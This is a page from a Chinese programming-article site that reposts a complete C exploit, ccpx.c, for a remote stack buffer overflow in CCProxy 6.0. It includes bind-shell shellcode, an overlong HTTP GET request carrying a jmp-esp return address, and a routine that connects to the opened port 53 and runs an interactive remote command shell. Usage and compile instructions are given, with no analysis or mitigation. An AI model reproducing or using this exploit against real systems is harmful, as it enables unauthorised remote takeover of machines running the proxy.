其他语言

本类阅读TOP10
·基于Solaris 开发环境的整体构思
·使用AutoMake轻松生成Makefile
·BCB数据库图像保存技术
·GNU中的Makefile
·射频芯片nRF401天线设计的分析
·iframe 的自适应高度
·BCB之Socket通信
·软件企业如何实施CMM
·入门系列--OpenGL最简单的入门
·WIN95中日志钩子(JournalRecord Hook)的使用

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
CCproxy 6 Exploit CN Version

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站
/*
* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit
* Author   : isno <[email protected]>
* Complie  : cl ccpx.c
* Usage    : ccpx <target_ip> [target_port]
*              default target_port is 808
* Stronger By Goldsun   [email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")

#define PPORT 808
#define XPORT 53
//lion's shellcode bind port 53
unsigned char shellcode[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59"
"\x35" //port
"\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";


int  Make_Connection(char *address,int port,int timeout);
void shell (int sock);

int main(int argc, char * argv[])
{
    SOCKET  csock, s2;
    WSADATA WSAData;
    int yn, offset, ret, pport;
    char line[80];
    char buf[8000], sbuf[10000];
    char local[100] = {0};
    char *localip;
    struct hostent * pHost;

    if(argc<2)
    {
        printf("CCPROXY 6 Exploit CN Writen By [email protected] & Compiled By Goldsun\n");
        printf("Usage: %s <target_ip> [target_port] [offset]\ndefault port is 808\n", argv[0]);
        return 1;
    }
    if(argc>=3)
        pport=atoi(argv[2]);
    else
        pport=PPORT;
    if(argc>=4)offset=atoi(argv[3]);
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    // 获取本机名
    gethostname((char*)local, sizeof(local)-1);
    // 获取本地 IP 地址
    pHost = gethostbyname((char*)local);
    localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);
    //offset=15-strlen(localip); //offset from target_ip len ret addr
    offset=2;
    printf("Local IP: %s Target IP: %s:%d\n",localip,argv[1],pport);
    printf("Target in the same subnet? [y/n] ");
    yn = _getch();
    if(yn == 0x6e || yn == 0x4e)
    {
        printf("\r\nHave  real Internet Ip Address ? [y/n] ");
        yn = _getch();
        if(yn == 0x6e || yn == 0x4e)
        {
            printf("\r\nYour gateway Internet ip address: ");
            gets(line);
            offset=15-strlen(line);
        }
    }
    //如果攻击目标为本地地址,则需要调整offset
    if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)
        //offset=15-strlen("127.0.0.1");
        offset=6;

    printf("\r\n[+] connecting to %s:%d\n", argv[1], pport);
    csock = Make_Connection(argv[1], pport, 10);
    if(csock<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }
    printf("Offset: %d",offset);
    memset(buf, 0, sizeof(buf)-1);
    memset(buf, 0x41, 4045+offset);
    memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));
    printf("  Magic Length: %d + 16 =",strlen(buf));
    strcat(buf, "\xcd\x54\xfa\x7f"); //ret addr jmp esp
    strcat(buf, "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4"); //jmp back

    sprintf(sbuf, "GET /%s HTTP/1.0\r\n\r\n", buf);
    printf("  buffer length: %d\n",strlen(buf));
    printf("[+] send magic buffer...\n");
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("[-] send err.\n");
        exit(1);
    }
    closesocket(csock);
    Sleep(1000);
    printf("[+] connecting to CMD shell port...\n");
    s2 = Make_Connection(argv[1], XPORT, 10);
    if(s2<0)
    {
        printf("[-] connect err:-<maybe there's firewall\n");
        exit(1);
    }
    shell(s2);
    WSACleanup();
    return 0;
}

//  解析域名
unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

//  建立TCP连接
//  输入:
//       char * address  IP地址
//       int  port       端口
//       int  timeout    延时
//  输出:
//  返回:
//       成功 >0
//       错误 <=0    
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
    int     l;
    char    buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
        {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
        }
        else
        {
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}

相关文章

相关软件